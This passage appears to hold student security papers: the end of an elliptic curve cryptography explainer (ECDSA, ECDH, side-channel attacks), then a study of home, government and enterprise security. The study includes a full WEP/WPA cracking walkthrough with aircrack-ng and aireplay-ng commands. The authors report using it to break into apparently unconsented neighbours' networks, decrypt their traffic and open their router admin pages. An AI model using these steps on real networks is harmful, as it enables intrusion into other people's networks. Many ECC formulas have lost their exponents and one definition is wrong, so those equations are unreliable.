curve. Point multiplication can be done by a combination of the two basic elliptic curve operations: point addition and point doubling which were explained on earlier sections. 44 In order to find perform point multiplication, log2 (k) will be required in order to fully compute. For example, if k = 11, then 11P = 2((2(2P)) + P) + P. If k = 23, then 23P = 2(2(2(2P) + P) + P) +P. This is the easiest method to perform point multiplication and there are other methods such as windowed method, sliding window method and wNAF method in computing point multiplication. 3 Underlying Theory of ECC 3.1 Public key and private key Assuming P and Q are 2 points on an elliptic curve such that Q = kP and k is a scalar. If only P and Q are given, it‟ll be very hard to compute k which is not only the discrete logarithm of Q to the base P but also serves as the private key which is selected randomly by the user. Basically to generate both public key and private key, the user selects a random integer k which is the private key and computes kP which will serve as the corresponding public key. 3.2 Discrete Logarithm Problem The discrete logarithm problem is described as the problem of finding x in the equation of gx = h provided that the elements g and h are of a finite cyclic group G. The discrete logarithm problem can also be described in another way, it‟s to compute logh = g when g and h are prime numbers. It is similar to the factoring problem whereby when the prime number becomes very big, the computation will be very slow; hence leading to the belief that discrete logarithm problem is very difficult. ECC is one of the cryptographic systems that rely on the difficulty of the discrete logarithm problem. Other cryptographic systems include Diffie-Hellman key agreement and Digital Signature Algorithm. 3.3 Elliptic Curve Domain Parameters for different finite fields In order to use ECC, all parties involved in the secured and trusted communication using ECC must agree on the elements and parameters which are called domain parameters that define the elliptic curve. Apart from the parameters a and b, other domain parameters for Prime field and Binary field must also be agreed. They will be described further later. The generation of domain parameters is not done by the parties involved since it involves counting the number of points on the elliptic curve. This will take up a lot of time and effort; hence there are several standard bodies such as NIST and SECG who published domain parameters of elliptic curves for some common field sizes. 45 3.3.1 Domain parameters for Elliptic Curve over Prime field For the elliptic curve over prime field, the domain parameters are p, G, n and h, as well as parameters a and b defined in the elliptic curve function, y2 mod p= x3 + ax + b mod p. p represents the prime number defined for prime field. G is the generator point coordinates (xG, yG) which is a point on the elliptic curve chosen for the cryptosystem n is the order of the elliptic curve. h = (number of points on the elliptic curve)/n, which is the cofactor The scalar for point multiplication is chosen as a number between 0 and n-1. 3.3.2 Domain parameters for Elliptic Curve over field Binary field For the elliptic curve over binary field, the domain parameters are m, f(x) as well as domain parameters G, n, h, a and b defined for elliptic curve over prime field above. m is an integer defined for the binary field where length of elements of the binary field ≤ m bits f(x) is a polynomial function with irreducible polynomial degree of m The scalar for point multiplication is chosen as a number between 0 and n-1. 4 Advantage over current schemes / Motivation 4.1 Small key size Comparing Integer Factorization (RSA) against Elliptic Curve Discrete Logarithm (ECDSA), they both have different mathematical problem when the attacker wishes to solve it and there are different methods in solving the problem. The mathematical problem of Integer Factorization is to find the prime factors of a number n whereas the mathematical problem of Elliptic Curve Discrete Logarithm is to find k in the equation Q = kP, with points Q and P on an elliptic curve. The most efficient and fastest method to solve Integer Factorization is the Number Field Sieve with the formula exp[1.923(log n)1/3 (log log n)2/3] (Sub-exponential) while the most efficient and fastest way to solve Elliptic Curve Discrete Logarithm is by Pollard-Rho algorithm with the formula sqrt(n) (fully exponential). Since the method Pollard-Rho algorithm runs more slowly than Number Field Sieve, ECC can offer the same security as bigger keys using Integer Factorization. This allows a 160bit ECC key to run at equal level as a 1024-bit RSA key. The smaller key size allows for faster computations, lesser bandwidth and memory usage and lower power consumption. So not only do small embedded devices benefit from using ECC, web servers can also lower computation and resources usage by using ECC. 46 5 Practical use of ECC 5.1 ECDSA - Elliptic Curve Digital Signature Algorithm and explanation 5.1.1 Digital Signature and DSA A digital signature algorithm is used for ensuring the authenticity of a message sent from the sender to the receiver. For instance, Alice and Bob are the two parties involved in the transmission. Both Alice and Bob will have their own public key and private key, as well as each other‟s public key. If Alice sends a message to Bob encrypted using Bob‟s public key, only Bob will be able to decrypt the message using his private key which is only known to him. Bob will then digitally sign his reply back to Alice by hashing his reply to create a message digest. The message digest assures that any changes made to the message that has been signed will not go undetected. Bob will then encrypt the message digest with his private key to create his digital signature. DSA has three phases; key generation, signature generation and signature verification. DSA Key Generation The key generation algorithm selects a random integer x where 0 <x <q. The private key is x and the public key is y = mod p, within the domain parameters (p, q, g). DSA Signature Generation Let H be the hashing function (e.g. SHA-1) and m is the message: 1) Select a random integer k where 0 < k < q 2) Compute r = ( mod p) mod q 3) Calculate s = [ ( H(m) + x.r) ) ] mod q The digital signature (e.g. Bob‟s) will be (r, s). Bob can now append his digital signature with the message he wants to send back to Alice. DSA Signature Verification To verify Bob‟s signature (r, s) on m, Alice obtains authentic copies of Bob‟s domain parameters (p, q, g) and public key y and does the following: 1) 2) 3) 4) 5) Reject the signature if 0 < r < q or 0 < s <q is not satisfied Calculate w = mod p Calculate u1 = H(m).w mod q Calculate u2 = r.w mod q Calculate v = (( . ) mod p) mod q Alice will be able to verify the digital signature with Bob‟s public key known. The signature is valid if v = r. 47 5.1.2 Elliptic Curve Digital Signature and ECDSA The Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the above mentioned DSA, using the elliptic curve cryptography. Essentially, ECDSA can be viewed as the elliptic curve version of the older discrete logarithm cryptosystems whereby the prime order group of non negative integers are replaced by the group of points on the elliptic curve over a finite field. The bit size of the public key used for ECDSA is about twice the size of security levels (in bits) as compared to DSA. An ECDSA public key would only need to be 160 bits to provide the same security level of a DSA public key which is at least 1024 bits. In addition, both DSA and ECDSA signature size is the same for the same security level. Similarly, ECDSA has three phases like DSA, key generation, signature generation and signature verification. ECDSA Key Generation Assuming Alice wants to send a message m to Bob, each will have a pair of keys associated with a particular set of EC domain parameters, D = (q, FR, a, b, G, n, h). There is an elliptic curve E defined over Fq, and P is a point of prime order n on the elliptic curve (e.g. E(Fq) ), q is a prime. To generate the keys, Alice and Bob will each have to: 1) Select a random integer d where 0 < d < n 2) Compute Q = d.P (Scalar Multiplication) 3) The public key will be Q and the private key will be d. ECDSA Signature Generation: Now that both Alice and Bob have a key pair suitable for elliptic curve cryptography, private key d and public key Q within domain parameters D = (q, FR, a, b, G, n, h), each of them can create their signature by doing the following: 1) Select a random integer k, where 0 < k < n 2) Compute kP = (x1, y1) and r = x1 mod n, where x1 is an integer between 0 and q-1 3) Compute mod n 4) Compute s = [ ( H(m) + d.r) ) ] mod n Alice‟s signature for message m is the pair of integers (r, s). ECDSA Signature Verification: In order for Bob to verify Alice‟s signature appended to the message m, (r, s), Bob obtains an authentic copy of Alice‟s domain parameters D = (q, FR, a, b, G, n, h) and public key Q and does the following: 48 1) 2) 3) 4) 5) Reject the signature if 0 < r < n-1 or 0 < s < n-1 is not satisfied Compute w = mod n, and H(m) Compute u1 = H(m).w mod n Compute u2 = r.w mod n Compute u1.P + u2.Q = (x0, y0) and v = x0 mod n Bob can accept the signature if v = r and verify that the message is sent by Alice. 5.2 ECDH - Elliptic Curve Diffie-Hellman and explanation 5.2.1 Diffie-Hellman Key Agreement Diffie-Hellman (DH) is a key agreement protocol, whereby two entities with no prior knowledge of each other create a shared secret key together, over an insecure communication channel. This shared secret key can then be used to encrypt subsequent communications. For Alice and Bob to create a shared secret key, both parties need to first exchange a prime P and a Generator G, where P > G and G is a primitive root of P. To share a secret key, Alice and Bob need to do the following: 1) Generate a random number XA (Alice‟s private key) and XB (Bob‟s private key) 2) Alice computes YA = mod p and send it to Bob 3) Bob computes YB = mod p and send it to Alice 4) Alice now computes Secret key = mod p 5) Bob now computes Secret key = mod p 5.2.2 Elliptic Curve Diffie-Hellman, ECDH Elliptic Curve Diffie-Hellman is a variant of the Diffie-Hellman key agreement protocol which allows two entities to establish a shared secret key as well. Similarly, any third party who doesn‟t have access to private keys of both entities will not be able to calculate the shared secret key even if he/she snoops upon the conversation. The shared secret key generation between the two entities using ECDH requires the agreement on elliptic curve domain parameters (defined in Elliptic Curve Domain Parameters for different finite fields). Both entities will each have a pair of keys consisting of a private key d, which is a randomly generated integer less than n, where n is the order of the curve, and a public key Q = d.G where G is the generator point within the elliptic curve domain parameter. For instance, Alice will have her private and public key pair (dA, QA) and Bob will have (dB, QB). To generate the shared secret key, both will do the following: 1) Alice computes K = (xk, yk) = dA. QB 2) Bob computes K = (xL, yL) = dB. QA 3) Since dA. QB = dA.dB.G = dB.dA.G = dB. QA. Therefore K = L and xk = xL 49 Hence, the shared secret key between Alice and Bob is xk (or xL). As mentioned, a third party will not be able to obtain the shared secret key as it is practically impossible to find the private keys dA or dB from the public key K or L. 6 Possible attacks In the elliptic curve cryptography, computation of the scalar multiplication of point P with the secret scalar factor d, Q = d.P is a critical step. Hence many attacks aim to discover the value d, which is the private key. 6.1 Side-channel attacks A side channel attack is an attack based on information gathered from the physical implementation of a cryptosystem, which is different from brute force attack or cryptanalysis. The timing information (the amount of time various computations take to perform), power consumption of the hardware, electromagnetic radiation leaks (which can provide plaintexts and other information) and even the sound produced during computation can provide extra source of information which can be used to real secret keys and attack the cryptosystem. There is an increasing trend of ECC implementations on smart cards and other portable devices (where the secret key is stored inside the smart card, seen as a tamper proof device as it is considered impossible to directly obtain the secret key without destroying the information), which makes ECC vulnerable to side channel attacks. A simple side channel attack attacker can try to derive the secret key directly from the samples obtained. The attacker will need to have in depth knowledge of the implementation of ECC algorithm he/she is attacking to successfully break the system. In addition, the attacker will need to be able to monitor the side channel leakages of the device and the secret key to be revealed must have a significant impact on the leakage. In ECDSA‟s scalar multiplication, Q = d.P implementations, the side channel attack exploits the different patterns between the side channel features of the addition operations and doubling operations of the point P on the elliptic curve. Hence, a secure method to prevent side channel attacks is to remove the dependence between the different patterns of side channel features of addition and doubling operations. One way to remove the key-dependent patterns is undistinguishing the process of bits “1” and “0” of multiplier d. This will help make the addition and doubling operations indistinguishable, dividing each process into blocks by inserting dummy operations to portray a repetition of instruction blocks which will not be detected by the attacker. 50 6.2 Fault attacks While side channel attacks are passive attacks whereby the attacker listens to some side channel for leakages without interfering with the computation, fault attacks (also known as fault analysis attacks) are active attacks whereby the attacker has to access to the target device and tampers with it in order to create faults or these faults may occur due to hardware failure or bugs when the device is performing a private key operation. Basically, the attacker will take advantage of the faults found due to his malicious activity or hardware failure. He can collect the incorrect data (caused by the faults) such as those mentioned in side channel attacks (e.g. timing and power consumption) sent out when the device is computing the private key. 7 Implementation We realize there is quite amounts of mathematical knowledge involved in Elliptic Cryptography, which might make it harder for people to understand how this technique works. So in order to present this topic more intuitively and make the theory easier to digest, we have developed a set of “Teaching ECC” web pages. These web pages graphically detail the key elliptic curve point operations and elliptic curve Discrete Logarithm problem involved. We also show how the underlying Elliptic Cryptography operations work through an example of practical use, Elliptic Curve Digital Signature Algorithm (ECDSA). The web pages are hosted at http://xiaokangz.comp.nus.edu.sg/CS3235/ECC . Introduction Page: This page briefly introduces the Elliptic Curve Cryptograph and general idea of Elliptic Curve Cryptography. Key advantages of this technique are listed to show the motivation of using such a scheme for computer security and readers will have a basic understanding of the underlying theories of this cryptography. Elliptic Curve Point Operations Page: This page serves the purpose of giving necessary mathematical knowledge used in Elliptic Curve Cryptography. We will show the Group Law of Elliptic Curve using graphs. And in order to give readers an intuitive idea of how point operations are done, interactive step-by-step demonstration on point doubling and point addition will be shown. Simply go though every step of the operations by clicking mouse and every step will be shown clearly on the graph. Elliptic Curve Discrete Logarithm Page: The high security of Elliptic Curve Cryptography relies on the difficulty of Elliptic Curve Discrete Logarithm Problem. This page introduces and explains the problem 51 using a simple example. To show how secure Elliptic Curve Cryptography is, we compare its key size with other cryptography schemes. Elliptic Curve Digital Signature Algorithm Page: We take a real example of Elliptic Curve Cryptography, the Elliptic Curve Digital Signature Algorithm (ECDSA) for demonstration. This page clearly shows all steps involved in both Signature Generation and Signature Verification. We have built a simple underlying engine for Elliptic Curve Digital Signature Algorithm, which can simulate the whole flow using small numbers. Thus readers can have the experience of walking through the generation and verification of digital signature process. 8 References 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. Elliptic curve cryptography, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Elliptic_curve_cryptography Discrete logarithm records, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Discrete_logarithm_records#Elliptic_curves Public key cryptography, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Public-key_cryptography Diffie-Hellman key exchange, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange Elliptic curve Diffie-Hellman, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Elliptic_curve_Diffie%E2%80%93Hellman Digital Signature Algorithm, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Digital_Signature_Algorithm Elliptic curve DSA, Wikipedia, the free encyclopaedia, http://en.wikipedia.org/wiki/Elliptic_Curve_DSA Avinash Kak: Lecture 14: Elliptic Curve Cryptography and Digital Rights Management, https://engineering.purdue.edu/kak/compsec/NewLectures/Lecture14.pdf Anoop MS: Elliptic Curve Cryptography, http://www.reverseengineering.info/Cryptography/AN1.5.07.pdf RSA Laboratories, http://www.rsa.com/rsalabs/node.asp?id=2165 Youdzone: What is a Digital Signature, http://www.youdzone.com/signature.html Aqueel Khalique, Kuldip Singh, Sandeep Sood: Implementation of Elliptic Curve Digital Signature Algorithm, http://www.ijcaonline.org/volume2/number2/pxc387876.pdf Wu Keke, Li Huiyun, Zhu Dingju, Yu Fengqi: Efficient Solution to Secure ECC Against Side-Channel Attacks, http://www.ejournal.org.cn/english/qikan/manage/wenzhang/EN20110316.pdf Anja Becker: Methods of Fault Analysis Attacks on Elliptic Curve Cryptosystems: Comparison and Combination of Countermeasures to resist SCA (2006) Sheueling Chang, Hans Eberle, Vipul Gupta, Nils Gura, Sun Microsystems Laboratories: Elliptic Curve Cryptography – How it Works, http://labs.oracle.com/projects/crypto/HowECCWorks-USLetter.pdf 52 Security Requirement in Different Environments Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang National University of Singapore 21 Lower Kent Ridge Road Singapore 119077 Abstract. The rational for conducting this research is to explore the different security measures and policies taken in environments such as home, office and government. For office and military environment, we went to several companies in Singapore, such as DSO and English Corner, for a field study to understand how these companies protect their data and information. Observations gathered are used to determine the security level of the various environments. However we see a limitation to the research in the government as details and policies are mostly non-disclosure. Therefore limited information could be gathered via Internet research and field study. As for home environment, a practical approach in detecting vulnerability of network is done where open source software is used in Linux operating system to crack the wireless network security. Moreover, an online survey is conducted to gather more information about how individuals secure their wireless network in the home environment. 1 Introduction Security issues and policy have been a topic on news articles and is a growing concern to all the different type of organization ranging from individual home environment to large corporation such as Government Environment. In addition these different environments might and required to deploy a different standard of security policy. Therefore this document aims to look at the different measures related to security taken by entities in different environments, specifically for Home, Government and Enterprise environments. Through examining the physical measures, computer security polices and wireless network security, this paper try to get a sense of how knowledgeable these entities are and how far they are willing to go in terms of protecting themselves from information theft. This research paper aim to highlight the different aspects of the environment therefore providing and highlighting ways in which improvement should be make in accordance to the environment. 53 2 2.1 Security in Home environment Types of device (Router, Modem) and Wireless Security used The security deployed in the home environment varies with individuals and often depends on the type of Internet service they subscript. In Singapore, there are 4 available network providers, namely, SingNet, Starhub, Pacnet and M1 but because most Singaporeans subscribe to either SingNet or Starhub and as evidence from the survey (Figure 33), which show that 71% of individuals uses SingNet and 24% uses Starhub, only these two providers will be discussed. For individuals who subscribe to SingNet, they will be provided with modem (2WIRE), which come with pre-configuration and default security setting. The older default security for the modem uses “WEP” encryption – with support from the collected survey in Figure 16 to Figure 32, individuals who subscribe to SingNet more than a year ago uses “WEP” encryption for their wireless network– for wireless and there are no password require to access into the device’s administration. Although the new device has improve their wireless security, WPA-PSK MIXED is used, there are still no default password require to access into administration. On the other hand, the security for Starhub can be quite different or vulnerable. The default setting for the device (Linksys) has no wireless protection and anyone can connect to it. Individuals are required to set their own security if they were to use Starhub. There are other routers sold in the market that individual can use to replace or addon to these existing routers which, ought to be deploy a better security than the providers’ device, but seldom do individuals willing to spend extra money to purchase a router as the existing one is suffice for surfing the Internet. The following sections discuss the vulnerability of the wireless network in the home environment based on real practical test deployed near a range of home networks. 2.2 Wireless security deployed in home environment (Research) There are pre-requisites before our practical test can be deployed at the home network environment. In our test, we will be using a USB D-Link network device as a base station to detect nearby wireless signal. Moreover, we will be using Ubuntu 11.10 for our operating system as it could run network-monitoring tools more efficiently as compare to windows. There are various tools used such as aircrack-ng, tcpdump, etc. To lookup on nearby wireless, ‘aircrack-ng’ monitoring tool is used. Figure 1 and 2 show the entire nearby available wireless network when the command “airodump-ng mon0” is entered, where mon0 is the wireless interface used. These two figures are captured in different location and we can see that most wireless network use WEP to secure the network although there are networks being secured using WPA/WPA2 but some, didn’t even secure their network at all. There are many reasons why WEP is still being used to secure wireless network in the Home environment. The most basic and common reason is that individuals do not have prior IT knowledge. To them, being able to connect to Internet with a simple 54 protection to deter other unauthorized users are sufficient. They do not have any knowledge about what WEP, WPA and WPA2 are and often just uses the default protection that is provided from the Internet Providers and some of them did not even protect their wireless. The second reason might lies with the ISP and vendors who supply the modem and router to them. For older devices, 3 to 4 years ago, it uses WEP for default protection. ISP efforts in offering “WEP” were to prevent sharing of Internet connection rather than for individual’s security. Although basic protection for newer devices uses WPA/WPA2, there are many individuals who did not change and are still using the older devices. WPA/WPA2 is used because of the weakness in WEP and also, the larger coverage (IEEE 802.11n) area it supports can be prone to attacks. WEP encryption is vulnerable to attack and there are available tools such that it takes advantage of weakness in the WEP key algorithm to attack a network successfully and discover the WEP key [1]. To crack a WEP network, sophisticated hardware or software tools are not required; Wi-Fi enable laptop and open-source network tools are sufficient. In the next section, we will show how easily WEP can be crack as compare to WPA and WPA2. 2.3 Vulnerability (Research) 2.3.1 WEP A number of flaws were discovered in the WEP algorithm in particularly, there are attacks such as passive attacks that decrypt traffic, active attack to inject new traffic, active attacks to decrypt traffic and dictionary-building attack that could allows realtime automated decryption of all traffic. [2] In this study, we will be using aircrack-ng[3] to recover WEP. Aircrack-ng uses the new unique initialization vector (IV) inside each packets and a large about of data packets are required to crack the WEP key. With the large amount of packets captured, keys can be found by implementing the standard FMS, Korek and PTW attack on the data packets that are captured In the previous section, we have managed to probe for nearby wireless networks, the next step is to locate any WEP-secured network that could be use for breaking. In Figure 3.1, we could see that ESSIB, “ruiqi” with BSSID of 00:1A:70:95:6A:C6 uses WEP. We will be using this network to recover the WEP key. To monitor and capture the traffic for ‘ruiqi’, the command, “sudo airodump-ng -c 11 –bssid 00:1A:70:95:6A:C6 -w ruiqi mon0” is executed where c is the channel to listen and w is the file that to be written. If there is no existing host connecting to the network, the data capture will be very slow (approx. 20,000 packets is required), but sometimes, it will be slow even there is any host connected to it. (Figure 3 top left). The next step is to do a fake authentication with the Access Point (AP). In order for the AP to accept packets, the source MAC address must be associated with it. 55 To associate the access point the command, ‘sudo aireplayng -1 6000 -o 1 -q 10 -e ruiqi -a 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0’2 is issued. This packet will be sending to the AP continuously to keep the association alive (Figure 3 top right) 1. Although we manage to do a fake authentication with the AP, the packet received from the AP will be very slow. In order to speed things up, packet reinjection with ‘aireplay-ng’ is used. The command, ‘sudo aireplay-ng --arpreplay -x 50 -b 00:1A:70:95:6A:C6 -h 1c:bd:b9:7d:1d:79 mon0’ is used and the number of data packets shoot up dramatically (Figure 3 bottom right). After a certain amount of packets, in this case, 20,006 packets, are received, the last step is to decrypt these packets in order to get the WEP key. The command, ‘aircrack-ng -b 00:1A:70:95:6A:C6 ruqi-01.cap’ is issued to start decrypting the packets and the WEP key was found after processing these packets (Figure 3 bottom left). To verify that the key does work, it is used to decrypt the packets that is send and received via the ‘ruiqi’ AP. In Figure 3.4, we can see the decrypted packet headers in plain texts and there are some packets that are send from owner’s host to AP. Other than ‘ruiqi’ AP, we also test out with other AP that uses WEP, which can be show in Table 1 and individual AP are shown in Figure 4 to 7. With all these WEP AP being cracked, it is evident in showing that WEP is not really secure, as it does not require much effort to crack it – less than three hours to crack all five AP in our case. Table 2 shows a full detail step of cracking AP that uses WEP to secure their network. 2.3.2 WPA/WPA2 As compared to WEP, WPA and WPA2 required more effort and time to crack and only pre-shared keys (PSK) could be cracked using available software such as aircrack-ng. Unlike WEP where we can speed up the packets to retrieve enough IV to find the passphrase, the only attack in WPA and WPA2 are plain brute force techniques (Dictionary Attack) because the key used is not static, so collecting IVs does not speed up the attack. Instead, the information used to start cracking WPA and WPA2 is the handshake between client and AP. To illustrate, we have tried to attack WPA and WPA2 in the home environment and below are our results. To start the interface and probe for nearby wireless network, the method used is as the same from the previous section and will not be discuss here again. Instead of monitoring and capture traffic from the network chosen, in this case we used ESSID of “Remyidah” as shown in Figure 4.0, we are collecting authentication handshake for that network and the command, airdump-ng –c 9 –bssid 00:1A:2B:8A:48:B9 –w Remyidah wlan0 is used and is shown in the top image of Figure 10. 1 -1 means fake authentication, 6000 is the re-association timing in seconds, -o 1 means send only one set of packet at a time, -q 10 means send keep alive packets every 10 seconds. 56 Although there as a way to deauthenticate wireless client by using the command “aireplay-ng -0 1 –a 00:1A:2B:8A:48:B9 wlan0”, this attempt was used for the case but failed. Therefore, we waited for nearly three hours for new 4-way handshakes to occur in the network as shown at the bottom image of Figure 4.0. Once the handshakes are capture and saved into Remyidah.cap, the next step is to actually crack the WPA/WPA2 pre-shared key with the password list keys we have obtained. The command “aircrack-ng –w password.lst –b 00:1A:2B:8A:48:B9” is used and the result is shown in Figure 11. Unfortunately, we are unable to crack the passphrase for the Remyidah network but we have also demonstrated this method on our own device with a given commonly used words as shown in Figure12 to retrieved passphrase. In conclusion, we can see that WPA-PSK and WPA2-PSK are vulnerable to brute force attack if the keys used are common known English words, known passwords and relatively short in length. Otherwise, it is nearly impossible to crack and hack into WPA because the technique will become more difficult to crack a long and random alphanumeric passphrase. The steps for our attempt to crack WPA-PSK an WPA2PSK are detailed in Table 3. 2.4 Other vulnerabilities in home environment (Research) 2.4.1 Administrator Access Every router or modem each has its own set of instructions to manage the network such as MAC filtering and network firewall. These instructions can be access via the router’s address, for example 192.168.0.1, only by those who have administrator rights. By default, most of these device does not uses any protection and even it they are, the user id and password are the same, for example, ‘admin’ for both. In the survey we have done to have a better understanding of individual access to their home network, there are almost 42% of individuals who did not secure or use the default setting for their network protection. Moreover, Figure 13 and 14 displays the administrator pages from the home networks that we have their WEP key cracked previously. In Figure 13, there is no password protection so it can be access without any effort. Although there is password protection for Figure 14, default protection is being used, which are “admin” for both username and password. We can see that for most home networks, individuals do not set or change the password for their device. Hence if any chance that their keys are compromise, their device will also be taken over by the intruder although they can reset the device if that happen. 2.4.2 Firewall On default, the firewall for modem in the home environment blocks access of unwanted activities in the Internet and act as a first-tier defense for all the devices connected to the AP. Although the firewall are not able to scan packets as of a software firewall, these blockage prevent the home network from being flooded and 57 could deter attack such as DNS. Firewall for router and modem are set as enable as default and is sufficient for the protection in the network itself. Figure 15 shows the default setting for firewall of the previously hacked home network. 3 Security in Government’s Institutes In the government’s institutes, there are huge collections of secrets and confidential information being stored in employee’s laptop and central server within the institutes. In addition, frequent transmission of top secrets and confidential documents in digital form are required for normal operations each and every day. Hence, there is a need to maintain a proper level of security for these digital resources. In Singapore, our government has entrusted several companies to develop a wide spectrum of unique technologies and solutions to safeguard government’s institutes against potential security threats. For example, Singapore government partner with eCop which developed government’s centrally administered desktop firewall (CAFÉ) and provided 24x7 network surveillance technology and service to detect attacks before they can cause any harm to IT systems[4]. Another example is the partnership with OPUS IT where it provides network forensics security solutions to various government agencies in Singapore. Its network-centric forensic technology system acts as a ‘silent’ shadow-surveillance enabling detective work for security & policy breach as well as fine-tuning high end network performance throughput. All systems developed by e-Cop and OPUS IT are being employed in Mindef-related institutes. To prevent intellectual property, trade secrets, and other confidential and proprietary business information from leaking out via recording devices, Singapore government banned camera phone and other recording devices in Mindef-related institutes and agency working on projects with confidential information. Severe punishment will be handed to personnel if they failed to comply with the policy. This policy is implemented in many countries’ government agencies such as Japan, China and Malaysia. Malaysia barred all gadgets with camera facilities from being brought into high-security government premises. The ban will prevent spying and the leaking of sensitive information or official secrets, which could jeopardize national security [5]. In addition, Government bodies were also instructed to look into installing electronic jamming devices in security zones to prevent unauthorized communication or transmission of data and images [5]. The electronic jamming devices works by combining hardware transmitters with a small piece of control software loaded into a camera phone handset. Hence, whenever the camera phone entered an area with electronic jamming hardware, the phone’s camera will be deactivated [6]. This prevents personnel from using the camera in these areas secured with electronic jamming hardware. 3.1 Centrally Administered Desktop Firewall The main intention of CAFÉ is to eliminate network-based attacks transmitted by thumb drives within the government. When the users are connected to the 58 Government network directly or remotely by the government desktop, an updated set of desktop firewall policies will be downloaded. Whenever a thumb drives is inserted into the Desktop, it will scan through all the data in it with CAFÉ. In the event that an infected computer is connected to the government network, CAFE will prevent the computer from spreading threats to other computers on the network. CAFÉ is further enhanced by 24x7 round-the-clock surveillance where it provides comprehensive reporting, incident handling with prompt responses, and prevention of unauthorized access or intrusion.[4] Similar to Singapore, USA also limit the usage of thumb drive and all other removable devices on its network due to the concerns that malicious programs may be transmitted using these mediums [7]. 3.2 Case Study in DSO While working in Defense Science Organization (DSO) as an intern during the last vacation, I noticed that it has a very stringent security regulation against all employees and visitors entering the building. A possible reason is that the activities conducted in the company are of high confidential as they are responsible to conduct research for future warfare. For example, their purpose is to develop technologies and solutions for the Singapore Armed Forces to sharpen the cutting edge of Singapore’s national Security. When entering the building, all visitors and employees will be screened by the security guards before they are cleared to enter the building. Any devices with camera function are not allowed to bring into the building. This is to ensure that no one can use these devices to capture importance information and leak the information to the unauthorized party. Furthermore, they are only allowed to bring in authorized laptop or equipment distributed by DSO to the building. Comparing to other companies, DSO does have a tighter security checks where it try to prevent potential harmful devices from entering the company. To access a department in the building, employees are required to scan it with their access card. However, each access card has different access right or permission depending on the individual’s job, rank and security clearances. An interesting point to note is there is no wireless connection in the entire building. Employees are required to access to the internet using wired connection (Ethernet). My mentor in DSO highlighted to me that wired connection is inherently more secure than wireless connection. Wireless, through its technological nature, can be intercepted easily as date being sent and received are transmitted in the air. Though wired connections can also be infiltrated, the need for physical access to the wires in most cases makes it inherently much more secure [8]. The security of wired connection is enhanced by the strict security checked at the entrance of the building and numerous surveillance cameras are installed at various places to detect suspicious activities. However, the Ethernet cable used is Cat 5/6 twisted pair which is not “Tempest” shielded. This means that the cable will emit electromagnetic radiation (EMR) in a manner that can be used to reconstruct intelligible data. With the correct equipment 59 and techniques, it is possible to reconstruct all or a substantial portion of that data [9]. The electromagnetic radiation can be picked up by person from a distance around 200 to 300 meters. However, we do not have much information about what DSO did to protect against the susceptibility of Ethernet cables to emit electromagnetic radiation. DSO may have employed several ways to safeguard them from TEMPEST. First, unauthorized individuals should not have access to the building. This means that these unauthorized individuals do not have the mean to get close to the source where electromagnetic radiation is emitted. Secondly, the wall of the department may be constructed in a way to block unintentional emissions out of the particular department. Other ways such as filtering and shielding of the communication devices can be executed for EM isolation [10]. As mentioned earlier, a wide spectrum of technologies are employed in government’s institutes. Hence, DSO is also using centrally administered desktop firewall (CAFÉ) and provided 24x7 network surveillance technology and service. 4 Security in Enterprises In the office environment employee would handle different type of files everyday and certain file are only accessible to higher up management only. Therefore different enterprise would have a different set of rules and regulations on their security policy. In addition different enterprise might employ different network setting and different wireless encryptions. In this section we would review the security environment of two firms which is the United Test and Assembly Center Ltd (UTAC) and the English Corners. We would review the policy of the 2 firms and do a comparison of these two different companies one mainly which is a relatively large company and the other is just a small enterprise of less the 10 employee. 4.1 Case Study in English Corners (Singapore Firm) Another case we review is on a small company name English Corners which sell their own books and educational toys to primary school kids and parents. In this section we would look at the various policy and security measures they have in a small enterprise. First the office has an open concept policy which means that customers could just walk-in to the company to purchase items and they would be able to get in contact with all the staff and computers. Therefore to protect our workstation from being view or used by other our work stations are protected with passwords and employees are requires to login via the assign password and user ID given. In addition they have a rule that an employee have to attend to the customers before the customers get close to their work station. While attending to the customers, they are required to logoff their workstation. This would prevent other users from using it. In this case of a small enterprise, it uses wireless connection via router for internet access. The password for the wireless network is only known to the higher 60 management personnel. However there’s a flaw here as the computer which has access to the router was not properly secure. Interns of the company are required to open the company and start up the company systems every morning. Therefore all intern allocated to starting up the system will know the password to the network. In addition, due to the fact that the company is a small enterprise, the company does not have any IT support department. All the networking and website of the company are done by the Boss son. Therefore the security of our network was of bare minimum protection which is the Wired Equivalent Privacy (WEP) which is mention above in section 2 home environment. In compare with home environment, office environment would have more users on the wireless network while home environment would have one or two users. This would make the office users more vulnerable over the wireless network while compare to home environment. English Corners has low security on file protection, this is due to the fact that being a small company we do not have intranet to pass our files to one and other. Therefore all transfer of file was done via sending it through a thumb drive. This would allow all personal in the office to have access to all sort of files within the thumb drive. This total lack of security allow even us interns to view lots of different files i.e the customers database excel file, all customers confidential credit card number and many others. There is totally no file control and all employees could easily read or modify the file within the thumb drive. In addition there was no policy of not being able to use personal thumb drive to copy out document and finishing the work at home. In conclusion the company which one of our researcher work in has limited and low security due to the fact that they might not understand the importance of protecting their data as they do not have a IT department which would follow up or set up a set of rules. They should have set up policy of no usage of external storage device and set up an intranet for the worker to share their documents and have a file policy of who would have access to what sort of information. 4.2 Case Study in United Test and Assembly Center Ltd A case study we have done is on a high tech manufacturing firm, United Test and Assembly Center Ltd (UTAC), which produces chips such as the SIM card used in mobile phones. They have reasonable security policies in place to protect the designs and technologies used in their manufacturing processes. To go pass the reception area, employees have to scan their employee pass through a sensor in order to open a door. Within the building itself, employees have to do more scanning of pass to get to where they need to go. This is because the building is divided into many areas. These areas generally fall under one of four areas: manufacturing, research and development (R&D), general administration and management information system (MIS) aka the IT department. Each area is divided by doors which require an employee to scan his pass in order to open the door. Hence UTAC managed to control the areas which an employee can access through the use of different level of pass. This is similar to the scenario described in our DSO case study. 61 For visitors, they need to exchange a pass if they are staying for a long period of time (eg: more than a day). If not, they must be accompanied by an employee who is required to bring them in and then stay with them at all times during their stay. Everyone who wants to exit the building have to go through a metal scanner under the watchful eyes 